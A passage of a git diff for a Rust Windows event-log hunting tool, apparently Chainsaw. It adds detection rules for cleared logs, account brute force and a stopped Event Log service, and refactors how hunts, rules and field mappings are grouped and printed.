+--- +title: System Logs Cleared +group: Log Tampering +description: The system logs were cleared. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.UserData.LogFileCleared.SubjectUserName + + +filter: + condition: system_log_cleared and not empty + + system_log_cleared: + Event.System.EventID: 104 + empty: + Event.UserData.LogFileCleared.SubjectUserName: diff --git a/rules/login_attacks/account_brute_force.yml b/rules/login_attacks/account_brute_force.yml new file mode 100644 index 00000000..9935fe9e --- /dev/null +++ b/rules/login_attacks/account_brute_force.yml @@ -0,0 +1,34 @@ +--- +title: Account Brute Force +group: Login Attacks +description: An account that appears to have been brute forced. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: User + to: Event.EventData.TargetUserName + + +filter: + condition: failed_logons and not empty + + failed_logons: + Event.System.EventID: 4625 + empty: + Event.EventData.TargetUserName: 'null' + + +aggregate: + count: '>5' + fields: + - Event.EventData.TargetUserName diff --git a/rules/service_tampering/event_log.yml b/rules/service_tampering/event_log.yml new file mode 100644 index 00000000..c4da7a36 --- /dev/null +++ b/rules/service_tampering/event_log.yml @@ -0,0 +1,29 @@ +--- +title: Windows Event Log Stopped +group: Service Tampering +description: The Windows Event Log service has been stopped. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: Service Name + to: Event.EventData.param1 + - name: Action + to: Event.EventData.param2 + + +filter: + Event.System.EventID: 7040 + Event.EventData.param1: Windows Event Log + Event.EventData.param2: disabled diff --git a/src/cli.rs b/src/cli.rs index 099e049e..e701bf2b 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -1,14 +1,20 @@ -use std::collections::HashMap; +use std::collections::{HashMap, HashSet}; use std::fs; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; use chrono_tz::Tz; use indicatif::{ProgressBar, ProgressDrawTarget, ProgressStyle}; use prettytable::{cell, format, Row, Table}; +use serde::Serialize; use tau_engine::Document; +use uuid::Uuid; -use crate::hunt::{Detection, Detections, Kind, Mapping}; -use crate::rule::Rule; +use crate::file::Kind as FileKind; +use crate::hunt::{Detections, Group, Hunt, Kind, Mapper, Mapping}; +use crate::rule::{ + chainsaw::{Level, Rule as Chainsaw, Status}, + Kind as RuleKind, +}; use crate::write::WRITER; #[cfg(not(windows))] @@ -68,10 +74,13 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String data } +// FIXME: All the table stuff needs a little think due to the field complexities... + pub fn print_detections( detections: &[Detections], + hunts: &[Hunt], mappings: &[Mapping], - rules: &[Rule], + rules: &HashMap>, column_width: u32, full: bool, local: bool, @@ -96,25 +105,38 @@ pub fn print_detections( .padding(1, 1) .build(); - let mappings: HashMap<_, HashMap<_, _>> = mappings - .iter() - .map(|m| (&m.name, m.groups.iter().map(|g| (&g.name, g)).collect())) - .collect(); - let rules: HashMap<_, _> = rules.iter().map(|r| (&r.tag, r)).collect(); + // Build headers + let mut headers: HashMap<&String, (Vec<&String>, HashSet<&String>)> = HashMap::new(); + for hunt in hunts { + let headers = headers + .entry(&hunt.group) + .or_insert((vec![], HashSet::new())); + for header in &hunt.headers { + if !headers.1.contains(&header) { + (*headers).0.push(&header); + (*headers).1.insert(&header); + } + } + } + // Build lookups + let mut groups: HashMap<&Uuid, &Group> = HashMap::new(); + for mapping in mappings { + for group in &mapping.groups { + groups.insert(&group.id, group); + } + } + let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); + let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); - // Do a single unfold... - let mut grouped: HashMap< - (&Option, &String), - Vec<(&NaiveDateTime, &Kind, Vec<&String>)>, - > = HashMap::new(); + // Do a single unfold... >> + let mut grouped: HashMap<&String, Vec<(&NaiveDateTime, &Kind, Vec<(&Uuid, &Uuid)>)>> = + HashMap::new(); for detection in detections { - let mut tags: HashMap<(&Option, &String), (&NaiveDateTime, Vec<&String>)> = - HashMap::new(); + let mut tags: HashMap<&String, (&NaiveDateTime, Vec<(&Uuid, &Uuid)>)> = HashMap::new(); for hit in &detection.hits { - let tags = tags - .entry((&hit.mapping, &hit.group)) - .or_insert((&hit.timestamp, vec![])); - (*tags).1.push(&hit.tag); + let group = &hunts.get(&hit.hunt).expect("could not get hunt").group; + let tags = tags.entry(&group).or_insert((&hit.timestamp, vec![])); + (*tags).1.push((&hit.hunt, &hit.rule)); } for (k, v) in tags { let grouped = grouped.entry(k).or_insert(vec![]); @@ -129,98 +151,135 @@ pub fn print_detections( grouped.sort_by(|x, y| x.0.cmp(&y.0)); let mut table = Table::new(); table.set_format(format); - let (mapping, group) = key; - if let Some(mapping) = mapping { - if let Some(groups) = mappings.get(mapping) { - let group = groups.get(&group).expect("could not get group!"); - let mut header = vec![ - cell!("timestamp").style_spec("c"), - cell!("detections").style_spec("c"), - ]; - if let Some(default) = group.default.as_ref() { - for field in default { - header.push(cell!(field).style_spec("c")); - } - } else { - header.push(cell!("data").style_spec("c")); + if let Some((headers, _)) = headers.remove(key) { + let mut cells = vec![ + cell!("timestamp").style_spec("c"), + cell!("detections").style_spec("c"), + ]; + if headers.is_empty() { + cells.push(cell!("data").style_spec("c")); + } else { + for header in &headers { + cells.push(cell!(header).style_spec("c")); } - table.add_row(Row::new(header)); - for (timestamp, kind, mut tags) in grouped { - tags.sort(); - let localised = if let Some(timezone) = timezone { - timezone - .from_local_datetime(timestamp) - .single() - .expect("failed to localise timestamp") - .to_rfc3339() - } else if local { - Utc.from_local_datetime(timestamp) - .single() - .expect("failed to localise timestamp") - .to_rfc3339() - } else { - DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() - }; - let mut cells = vec![cell!(localised)]; - if metadata { - let mut table = Table::new(); + } + table.add_row(Row::new(cells)); + for (timestamp, kind, ids) in grouped { + // FIXME: Sort rules + //ids.sort(); + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + }; + let mut cells = vec![cell!(localised)]; + if metadata { + let mut table = Table::new(); + table.add_row(Row::new(vec![ + cell!("name").style_spec("c"), + cell!("authors").style_spec("c"), + cell!("level").style_spec("c"), + cell!("status").style_spec("c"), + ])); + for (_, rid) in &ids { + let rule = rules.get(rid).expect("could not get rule"); table.add_row(Row::new(vec![ - cell!("name").style_spec("c"), - cell!("authors").style_spec("c"), - cell!("level").style_spec("c"), - cell!("status").style_spec("c"), + cell!(rule.name), + cell!(rule.authors.join("\n")), + cell!(rule.level), + cell!(rule.status), ])); - for tag in tags { - let rule = rules.get(&tag).expect("could not get rule"); - table.add_row(Row::new(vec![ - cell!(tag), - cell!(rule.authors.join("\n")), - cell!(rule.level), - cell!(rule.status), - ])); - } - cells.push(cell!(table)); - } else { - cells.push(cell!(tags - .iter() - .map(|tag| format!("{} {}", RULE_PREFIX, tag.as_str())) - .collect::>() - .join("\n"))); } - let document = match kind { - Kind::Individual { document } => document, + cells.push(cell!(table)); + } else { + cells.push(cell!(ids + .iter() + .map(|(_, rid)| format!( + "{} {}", + RULE_PREFIX, + rules.get(rid).expect("could not get rule").name.as_str() + )) + .collect::>() + .join("\n"))); + } + let document = match kind { + Kind::Individual { document } => document, + Kind::Aggregate { documents } => { + documents.first().expect("could not get document") + } + }; + if headers.is_empty() { + let json = serde_json::to_string(&document.data) + .expect("could not serialise document"); + cells.push(cell!(format_field_length(&json, false, column_width))); + } else { + // This is really complicated, we could land in the same group but be from + // different hunts that have different headers, that also could even overlap... + // Because we group we won't be able to reliably handle clashes. + let mut hids = HashSet::new(); + for (hid, _) in &ids { + hids.insert(hid); + } + let wrapper = match &document.kind { + FileKind::Evtx => crate::evtx::Wrapper(&document.data), _ => continue, }; - if let Some(default) = group.default.as_ref() { - for field in default { - if let Some(value) = group - .fields - .get(field) - .and_then(|k| document.data.find(k)) - .and_then(|v| v.to_string()) - { - cells.push(cell!(format_field_length(&value, full, column_width))); - } else { - cells.push(cell!("")); + let mut hdrs = HashMap::new(); + for hid in hids { + let hunt = hunts.get(hid).expect("could not get hunt"); + let fields = match &hunt.kind { + crate::hunt::HuntKind::Group { .. } => { + &groups.get(&hunt.id).expect("could not get group").fields + } + crate::hunt::HuntKind::Rule { .. } => { + &rules.get(&hunt.id).expect("could not get rule").fields } + }; + let flds: HashMap<_, _> = + fields.iter().map(|f| (&f.name, &f.from)).collect(); + for header in &headers { + if let Some(from) = flds.get(header) { + let mapper = Mapper(&hunt.mapper, &wrapper); + if let Some(value) = mapper.find(&from).and_then(|v| v.to_string()) + { + hdrs.insert( + header, + format_field_length(&value, full, column_width), + ); + } + } + } + } + for header in &headers { + if let Some(value) = hdrs.get(header) { + cells.push(cell!(value)); + } else { + cells.push(cell!("")); } - } else { - let json = serde_json::to_string(&document.data) - .expect("could not serialise document"); - cells.push(cell!(format_field_length(&json, false, column_width))); } - table.add_row(Row::new(cells)); } + table.add_row(Row::new(cells)); } } - cs_greenln!("\n[+] Group: {}", key.1); + cs_greenln!("\n[+] Group: {}", key); cs_print_table!(table); } } pub fn print_csv( detections: &[Detections], + hunts: &[Hunt], mappings: &[Mapping], + rules: &HashMap>, local: bool, timezone: Option, ) -> crate::Result<()> { @@ -231,23 +290,37 @@ pub fn print_csv( .expect("could not get output directory") }; fs::create_dir_all(directory)?; - let mappings: HashMap<_, HashMap<_, _>> = mappings - .iter() - .map(|m| (&m.name, m.groups.iter().map(|g| (&g.name, g)).collect())) - .collect(); + // Build headers + let mut headers: HashMap<&String, (Vec<&String>, HashSet<&String>)> = HashMap::new(); + for hunt in hunts { + let headers = headers + .entry(&hunt.group) + .or_insert((vec![], HashSet::new())); + for header in &hunt.headers { + if !headers.1.contains(&header) { + (*headers).0.push(&header); + (*headers).1.insert(&header); + } + } + } + // Build lookups + let mut groups: HashMap<&Uuid, &Group> = HashMap::new(); + for mapping in mappings { + for group in &mapping.groups { + groups.insert(&group.id, group); + } + } + let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); + let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); // Do a single unfold... - let mut grouped: HashMap< - (&Option, &String), - Vec<(&NaiveDateTime, &Kind, Vec<&String>)>, - > = HashMap::new(); + let mut grouped: HashMap<&String, Vec<(&NaiveDateTime, &Kind, Vec<(&Uuid, &Uuid)>)>> = + HashMap::new(); for detection in detections { - let mut tags: HashMap<(&Option, &String), (&NaiveDateTime, Vec<&String>)> = - HashMap::new(); + let mut tags: HashMap<&String, (&NaiveDateTime, Vec<(&Uuid, &Uuid)>)> = HashMap::new(); for hit in &detection.hits { - let tags = tags - .entry((&hit.mapping, &hit.group)) - .or_insert((&hit.timestamp, vec![])); - (*tags).1.push(&hit.tag); + let group = &hunts.get(&hit.hunt).expect("could not get hunt").group; + let tags = tags.entry(&group).or_insert((&hit.timestamp, vec![])); + (*tags).1.push((&hit.hunt, &hit.rule)); } for (k, v) in tags { let grouped = grouped.entry(k).or_insert(vec![]); @@ -260,91 +333,141 @@ pub fn print_csv( let mut grouped = grouped.remove(&key).expect("could not get grouped!"); grouped.sort_by(|x, y| x.0.cmp(&y.0)); // FIXME: Handle name clashes - let filename = format!("{}.csv", key.1.replace(" ", "_").to_lowercase()); + let filename = format!("{}.csv", key.replace(" ", "_").to_lowercase()); let path = directory.join(&filename); let mut csv = prettytable::csv::Writer::from_path(path)?; cs_eprintln!("[+] Created {}", filename); - let (mapping, group) = key; - if let Some(mapping) = mapping { - if let Some(groups) = mappings.get(mapping) { - let group = groups.get(&group).expect("could not get group!"); - let mut header = vec!["timestamp", "detections"]; - if let Some(default) = group.default.as_ref() { - for field in default { - header.push(field); + if let Some((headers, _)) = headers.remove(key) { + let mut cells = vec!["timestamp", "detections"]; + if headers.is_empty() { + cells.push("data"); + } else { + for header in &headers { + cells.push(header); + } + } + csv.write_record(cells)?; + for (timestamp, kind, ids) in grouped { + // FIXME: Sort tags + //tags.sort(); + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + }; + let mut cells = vec![localised]; + cells.push( + ids.iter() + .map(|(_, rid)| { + format!( + "{}", + rules.get(rid).expect("could not get rule").name.as_str() + ) + }) + .collect::>() + .join(";"), + ); + let document = match kind { + Kind::Individual { document } => document, + Kind::Aggregate { documents } => { + documents.first().expect("could not get document") } + }; + if headers.is_empty() { + let json = serde_json::to_string(&document.data) + .expect("could not serialise document"); + cells.push(json); } else { - header.push("data"); - } - csv.write_record(header)?; - for (timestamp, kind, mut tags) in grouped { - tags.sort(); - let localised = if let Some(timezone) = timezone { - timezone - .from_local_datetime(timestamp) - .single() - .expect("failed to localise timestamp") - .to_rfc3339() - } else if local { - Utc.from_local_datetime(timestamp) - .single() - .expect("failed to localise timestamp") - .to_rfc3339() - } else { - DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() - }; - let mut cells = vec![localised]; - cells.push( - tags.iter() - .map(|tag| format!("{}", tag.as_str())) - .collect::>() - .join(";"), - ); - let document = match kind { - Kind::Individual { document } => document, + // This is really complicated, we could land in the same group but be from + // different hunts that have different headers, that also could even overlap... + // Because we group we won't be able to reliably handle clashes. + let mut hids = HashSet::new(); + for (hid, _) in &ids { + hids.insert(hid); + } + let wrapper = match &document.kind { + FileKind::Evtx => crate::evtx::Wrapper(&document.data), _ => continue, }; - if let Some(default) = group.default.as_ref() { - for field in default { - if let Some(value) = group - .fields - .get(field) - .and_then(|k| document.data.find(k)) - .and_then(|v| v.to_string()) - { - cells.push(value); - } else { - cells.push("".to_owned()); + let mut hdrs = HashMap::new(); + for hid in hids { + let hunt = hunts.get(hid).expect("could not get hunt"); + let fields = match &hunt.kind { + crate::hunt::HuntKind::Group { .. } => { + &groups.get(&hunt.id).expect("could not get group").fields + } + crate::hunt::HuntKind::Rule { .. } => { + &rules.get(&hunt.id).expect("could not get rule").fields } + }; + let flds: HashMap<_, _> = + fields.iter().map(|f| (&f.name, &f.from)).collect(); + for header in &headers { + if let Some(from) = flds.get(header) { + let mapper = Mapper(&hunt.mapper, &wrapper); + if let Some(value) = mapper.find(&from).and_then(|v| v.to_string()) + { + hdrs.insert(header, value); + } + } + } + } + for header in &headers { + if let Some(value) = hdrs.get(header) { + cells.push(value.to_string()); + } else { + cells.push("".to_owned()); } - } else { - let json = serde_json::to_string(&document.data) - .expect("could not serialise document"); - cells.push(json); } - csv.write_record(cells)?; } + csv.write_record(cells)?; } } } Ok(()) } +#[derive(Debug, Serialize)] +pub struct Detection<'a> { + pub group: &'a String, + #[serde(flatten)] + pub kind: &'a Kind, + pub name: &'a String, + pub timestamp: String, + + pub authors: &'a Vec, + pub level: &'a Level, + pub source: &'a RuleKind, + pub status: &'a Status, +} + pub fn print_json( detections: &[Detections], - rules: &[Rule], + rules: &HashMap>, local: bool, timezone: Option, ) -> crate::Result<()> { - // TODO: Fixme... - let ruleset = "sigma".to_owned(); - let rules: HashMap<_, _> = rules.iter().map(|r| (&r.tag, r)).collect(); + let mut rs: HashMap<_, _> = HashMap::new(); + for (kind, rules) in rules { + for (id, rule) in rules { + rs.insert(id, (kind, rule)); + } + } let mut detections = detections .iter() .map(|d| { let mut detections = Vec::with_capacity(d.hits.len()); for hit in &d.hits { - let rule = rules.get(&hit.tag).expect("could not get rule!"); + let (kind, rule) = rs.get(&hit.rule).expect("could not get rule!"); let localised = if let Some(timezone) = timezone { timezone .from_local_datetime(&hit.timestamp) @@ -361,11 +484,11 @@ pub fn print_json( }; detections.push(Detection { authors: &rule.authors, - group: &hit.group, + group: &rule.group, kind: &d.kind, level: &rule.level, - name: &hit.tag, - source: &ruleset, + name: &rule.name, + source: kind, status: &rule.status, timestamp: localised, }) diff --git a/src/ext/tau.rs b/src/ext/tau.rs index 84c6cf88..fe5fd429 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs @@ -1,5 +1,37 @@ use aho_corasick::AhoCorasickBuilder; -use tau_engine::core::parser::{BoolSym, Expression, IdentifierParser, MatchType, Pattern, Search}; +use serde::de; +use serde_yaml::Value as Yaml; +use tau_engine::core::parser::{ + parse_identifier, BoolSym, Expression, IdentifierParser, MatchType, Pattern, Search, +}; + +pub fn deserialize_expression<'de, D>(deserializer: D) -> Result +where + D: de::Deserializer<'de>, +{ + let yaml: Yaml = de::Deserialize::deserialize(deserializer)?; + parse_identifier(&yaml).map_err(de::Error::custom) +} + +pub fn deserialize_numeric<'de, D>(deserializer: D) -> Result +where + D: de::Deserializer<'de>, +{ + let string: String = de::Deserialize::deserialize(deserializer)?; + if let Ok(i) = str::parse::(&string) { + return Ok(Pattern::Equal(i)); + } + let identifier = string.into_identifier().map_err(de::Error::custom)?; + match &identifier.pattern { + &Pattern::Equal(_) + | &Pattern::GreaterThan(_) + | &Pattern::GreaterThanOrEqual(_) + | &Pattern::LessThan(_) + | &Pattern::LessThanOrEqual(_) => {} + _ => return Err(de::Error::custom("only numeric expressions are allowed")), + } + Ok(identifier.pattern) +} pub fn parse_kv(kv: &str) -> crate::Result { let mut parts = kv.split(": "); diff --git a/src/file/evtx.rs b/src/file/evtx.rs index 6666ab89..9e6b88dd 100644 --- a/src/file/evtx.rs +++ b/src/file/evtx.rs @@ -1,4 +1,3 @@ -use std::collections::{HashMap, HashSet}; use std::fs::File; use std::path::Path; @@ -7,8 +6,6 @@ use regex::RegexSet; use serde_json::Value as Json; use tau_engine::{Document, Value as Tau}; -use crate::hunt::{Group, Huntable}; -use crate::rule::Rule; use crate::search::Searchable; pub type Evtx = SerializedEvtxRecord; @@ -33,13 +30,6 @@ impl Parser { } } -pub struct Mapper<'a>(&'a HashMap, &'a Wrapper<'a>); -impl<'a> Document for Mapper<'a> { - fn find(&self, key: &str) -> Option> { - self.0.get(key).and_then(|v| self.1.find(v)) - } -} - pub struct Wrapper<'a>(pub &'a Json); impl<'a> Document for Wrapper<'a> { fn find(&self, key: &str) -> Option> { @@ -62,30 +52,6 @@ impl<'a> Document for Wrapper<'a> { } } -impl Huntable for &SerializedEvtxRecord { - fn hits( - &self, - rules: &[Rule], - exclusions: &HashSet, - group: &Group, - ) -> Option> { - let wrapper = Wrapper(&self.data); - if tau_engine::core::solve(&group.filter, &wrapper) { - let mut tags = vec![]; - for rule in rules { - if exclusions.contains(&rule.tag) { - continue; - } - if rule.tau.matches(&Mapper(&group.fields, &wrapper)) { - tags.push(rule.tag.clone()); - } - } - return Some(tags); - } - None - } -} - impl Searchable for SerializedEvtxRecord { fn matches(&self, regex: &RegexSet) -> bool { regex.is_match(&self.data.to_string()) diff --git a/src/file/mod.rs b/src/file/mod.rs index 21e35fac..7096ef36 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -1,10 +1,13 @@ use std::fs; use std::path::{Path, PathBuf}; +use serde::{Deserialize, Serialize}; + use self::evtx::{Evtx, Parser as EvtxParser}; pub mod evtx; +#[derive(Clone)] pub enum Document { Evtx(Evtx), } @@ -13,6 +16,13 @@ pub struct Documents<'a> { iterator: Box> + 'a>, } +#[derive(Clone, Debug, PartialEq, Deserialize, Serialize)] +#[serde(rename_all = "snake_case")] +pub enum Kind { + Evtx, + Unknown, +} + impl<'a> Iterator for Documents<'a> { type Item = crate::Result; @@ -103,6 +113,13 @@ impl Reader { }; Documents { iterator } } + + pub fn kind(&self) -> Kind { + match self.parser { + Parser::Evtx(_) => Kind::Evtx, + Parser::Unknown => Kind::Unknown, + } + } } pub fn get_files( diff --git a/src/hunt.rs b/src/hunt.rs index 28f5da7e..6f323d3d 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -1,54 +1,49 @@ -use std::collections::{HashMap, HashSet}; -use std::fs::File; +use std::collections::{hash_map::DefaultHasher, HashMap, HashSet}; +use std::fs; +use std::hash::{Hash, Hasher}; use std::io::Read; use std::path::{Path, PathBuf}; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; use chrono_tz::Tz; -use serde::{de, Deserialize, Serialize}; +use serde::{Deserialize, Serialize}; use serde_json::Value as Json; -use serde_yaml::Value as Yaml; use tau_engine::{ - core::parser::{parse_identifier, Expression}, - Document as Docu, + core::parser::{Expression, Pattern}, + Document as TauDocument, Value as Tau, }; +use uuid::Uuid; -use crate::file::{Document as Doc, Reader}; -use crate::rule::{Kind as RuleKind, Rule}; +use crate::file::{Document as File, Kind as FileKind, Reader}; +use crate::rule::{ + chainsaw::{Aggregate, Field, Filter, Rule as Chainsaw}, + Kind as RuleKind, Rule, +}; -#[derive(Deserialize)] +#[derive(Clone, Deserialize)] pub struct Group { - #[serde(default)] - pub default: Option>, - pub fields: HashMap, - #[serde(deserialize_with = "deserialize_expression")] + #[serde(skip, default = "Uuid::new_v4")] + pub id: Uuid, + pub fields: Vec, + #[serde(deserialize_with = "crate::ext::tau::deserialize_expression")] pub filter: Expression, pub name: String, pub timestamp: String, } -fn deserialize_expression<'de, D>(deserializer: D) -> Result -where - D: de::Deserializer<'de>, -{ - let yaml: Yaml = de::Deserialize::deserialize(deserializer)?; - parse_identifier(&yaml).map_err(de::Error::custom) -} - #[derive(Deserialize)] pub struct Mapping { #[serde(default)] pub exclusions: HashSet, pub groups: Vec, - pub kind: String, + pub kind: FileKind, pub name: String, pub rules: RuleKind, } pub struct Hit { - pub group: String, - pub mapping: Option, - pub tag: String, + pub hunt: Uuid, + pub rule: Uuid, pub timestamp: NaiveDateTime, } @@ -57,22 +52,9 @@ pub struct Detections { pub kind: Kind, } -#[derive(Debug, Serialize)] -pub struct Detection<'a> { - pub authors: &'a Vec, - pub group: &'a String, - #[serde(flatten)] - pub kind: &'a Kind, - pub level: &'a String, - pub name: &'a String, - pub source: &'a String, - pub status: &'a String, - pub timestamp: String, -} - #[derive(Debug, Serialize)] pub struct Document { - pub kind: String, + pub kind: FileKind, pub data: Json, } @@ -83,15 +65,6 @@ pub enum Kind { Individual { document: Document }, } -pub trait Huntable { - fn hits( - &self, - rules: &[Rule], - exclusions: &HashSet, - group: &Group, - ) -> Option>; -} - #[derive(Default)] pub struct HunterBuilder { mappings: Option>, @@ -111,23 +84,83 @@ impl HunterBuilder { } pub fn build(self) -> crate::Result { + let mut hunts = vec![]; + let rules = match self.rules { + Some(mut rules) => { + rules.sort_by(|x, y| x.chainsaw.name.cmp(&y.chainsaw.name)); + let mut map = HashMap::new(); + for rule in rules { + let uuid = Uuid::new_v4(); + let rules = map.entry(rule.kind.clone()).or_insert(vec![]); + if &rule.kind == &RuleKind::Chainsaw { + let mapper = MapperKind::from(&rule.chainsaw.fields); + hunts.push(Hunt { + id: uuid.clone(), + + group: rule.chainsaw.group.clone(), + headers: rule + .chainsaw + .fields + .iter() + .filter_map(|f| if f.visible { Some(&f.name) } else { None }) + .cloned() + .collect(), + kind: HuntKind::Rule { + aggregate: rule.chainsaw.aggregate.clone(), + filter: rule.chainsaw.filter.clone(), + }, + timestamp: rule.chainsaw.timestamp.clone(), + + file: rule.chainsaw.kind.clone(), + mapper, + rule: rule.kind, + }); + } + (*rules).push((uuid, rule.chainsaw)); + } + map + } + None => HashMap::new(), + }; let mappings = match self.mappings { - Some(mappings) => { + Some(mut mappings) => { + mappings.sort(); let mut scratch = vec![]; for mapping in mappings { - let mut file = File::open(mapping)?; + let mut file = fs::File::open(mapping)?; let mut content = String::new(); file.read_to_string(&mut content)?; - scratch.push(serde_yaml::from_str(&mut content)?); + let mut mapping: Mapping = serde_yaml::from_str(&mut content)?; + mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); + for group in &mapping.groups { + let mapper = MapperKind::from(&group.fields); + hunts.push(Hunt { + id: group.id.clone(), + + group: group.name.clone(), + headers: group + .fields + .iter() + .filter_map(|f| if f.visible { Some(&f.name) } else { None }) + .cloned() + .collect(), + kind: HuntKind::Group { + exclusions: mapping.exclusions.clone(), + filter: group.filter.clone(), + }, + timestamp: group.timestamp.clone(), + + file: mapping.kind.clone(), + mapper, + rule: mapping.rules.clone(), + }); + } + scratch.push(mapping); } scratch } None => vec![], }; - let rules = match self.rules { - Some(rules) => rules, - None => vec![], - }; let load_unknown = self.load_unknown.unwrap_or_default(); let local = self.local.unwrap_or_default(); @@ -135,6 +168,7 @@ impl HunterBuilder { Ok(Hunter { inner: HunterInner { + hunts, mappings, rules, @@ -189,9 +223,70 @@ impl HunterBuilder { } } +pub enum HuntKind { + Group { + exclusions: HashSet, + filter: Expression, + }, + Rule { + aggregate: Option, + filter: Filter, + }, +} + +pub enum MapperKind { + None, + Fast(HashMap), + Full(HashMap), +} + +impl MapperKind { + pub fn from(fields: &Vec) -> Self { + let mut fast = false; + let mut full = false; + for field in fields { + if field.container.is_some() { + full = true; + break; + } + if field.from != field.to { + fast = true; + } + } + if full { + let mut map = HashMap::with_capacity(fields.len()); + for field in fields { + map.insert(field.from.clone(), field.clone()); + } + MapperKind::Full(map) + } else if fast { + let mut map = HashMap::with_capacity(fields.len()); + for field in fields { + map.insert(field.from.clone(), field.to.clone()); + } + MapperKind::Fast(map) + } else { + MapperKind::None + } + } +} + +pub struct Hunt { + pub id: Uuid, + pub group: String, + pub headers: Vec, + pub kind: HuntKind, + pub timestamp: String, + + pub file: FileKind, + pub mapper: MapperKind, + pub rule: RuleKind, +} + pub struct HunterInner { + hunts: Vec, mappings: Vec, - rules: Vec, + rules: HashMap>, load_unknown: bool, local: bool, @@ -201,6 +296,22 @@ pub struct HunterInner { to: Option>, } +//pub struct Mapper<'a>(&'a HashMap, &'a dyn TauDocument); +pub struct Mapper<'a>(pub &'a MapperKind, pub &'a dyn TauDocument); +impl<'a> TauDocument for Mapper<'a> { + fn find(&self, key: &str) -> Option> { + match &self.0 { + MapperKind::None => self.1.find(key), + MapperKind::Fast(map) => match map.get(key) { + Some(v) => self.1.find(v), + None => self.1.find(key), + }, + //MapperKind::Full(map) => unimplemented!(), + MapperKind::Full(map) => self.1.find(key), + } + } +} + pub struct Hunter { inner: HunterInner, } @@ -212,8 +323,13 @@ impl Hunter { pub fn hunt(&self, file: &Path) -> crate::Result> { let mut reader = Reader::load(file, self.inner.load_unknown, self.inner.skip_errors)?; + let kind = reader.kind(); + // This can be optimised better ;) let mut detections = vec![]; + let mut aggregates: HashMap>)> = HashMap::new(); + let mut files: HashMap = HashMap::new(); for document in reader.documents() { + let document_id = Uuid::new_v4(); let document = match document { Ok(document) => document, Err(e) => { @@ -223,134 +339,225 @@ impl Hunter { return Err(e); } }; - - // The logic is as follows, all rules except chainsaw ones need a mapping. - - // TODO: Handle chainsaw rules... - - for mapping in &self.inner.mappings { - if mapping.kind != "evtx" { + let wrapper = match &document { + File::Evtx(evtx) => crate::evtx::Wrapper(&evtx.data), + }; + let mut hits = vec![]; + for hunt in &self.inner.hunts { + if hunt.file != kind { continue; } - let mut hits = vec![]; - for group in &mapping.groups { - // TODO: Default to RFC 3339 - let timestamp = match &document { - Doc::Evtx(evtx) => { - match crate::evtx::Wrapper(&evtx.data).find(&group.timestamp) { - Some(value) => match value.as_str() { - Some(timestamp) => match NaiveDateTime::parse_from_str( - timestamp, - "%Y-%m-%dT%H:%M:%S%.6fZ", - ) { - Ok(t) => t, - Err(e) => { - if self.inner.skip_errors { - cs_eyellowln!( - "failed to parse timestamp '{}' - {}", - timestamp, - e, - ); - continue; - } else { - anyhow::bail!( - "failed to parse timestamp '{}' - {}", - timestamp, - e - ); - } - } - }, - None => continue, - }, - None => continue, - } - } - }; - - if self.inner.from.is_some() || self.inner.to.is_some() { - // TODO: Not sure if this is correct... - let localised = if let Some(timezone) = self.inner.timezone { - let local = match timezone.from_local_datetime(×tamp).single() { - Some(l) => l, - None => { + let mapper = Mapper(&hunt.mapper, &wrapper); + + let timestamp = match mapper.find(&hunt.timestamp) { + Some(value) => match value.as_str() { + Some(timestamp) => { + match NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") + { + Ok(t) => t, + Err(e) => { if self.inner.skip_errors { - cs_eyellowln!("failed to localise timestamp"); + cs_eyellowln!( + "failed to parse timestamp '{}' - {}", + timestamp, + e, + ); continue; } else { - anyhow::bail!("failed to localise timestamp"); + anyhow::bail!( + "failed to parse timestamp '{}' - {}", + timestamp, + e + ); } } - }; - local.with_timezone(&Utc) - } else if self.inner.local { - match Utc.from_local_datetime(×tamp).single() { - Some(l) => l, - None => { - if self.inner.skip_errors { - cs_eyellowln!("failed to localise timestamp"); + } + } + None => continue, + }, + None => continue, + }; + + if self.skip(timestamp)? { + continue; + } + + match &hunt.kind { + HuntKind::Group { exclusions, filter } => { + if let Some(rules) = self.inner.rules.get(&hunt.rule) { + if tau_engine::core::solve(&filter, &mapper) { + for (rid, rule) in rules { + if exclusions.contains(&rule.name) { continue; - } else { - anyhow::bail!("failed to localise timestamp"); + } + let hit = match &rule.filter { + Filter::Detection(detection) => { + tau_engine::solve(&detection, &mapper) + } + Filter::Expression(expression) => { + tau_engine::core::solve(&expression, &mapper) + } + }; + if hit { + hits.push(Hit { + hunt: hunt.id.clone(), + rule: rid.clone(), + timestamp, + }); } } } - } else { - DateTime::::from_utc(timestamp, Utc) - }; - // Check if event is older than start date marker - if let 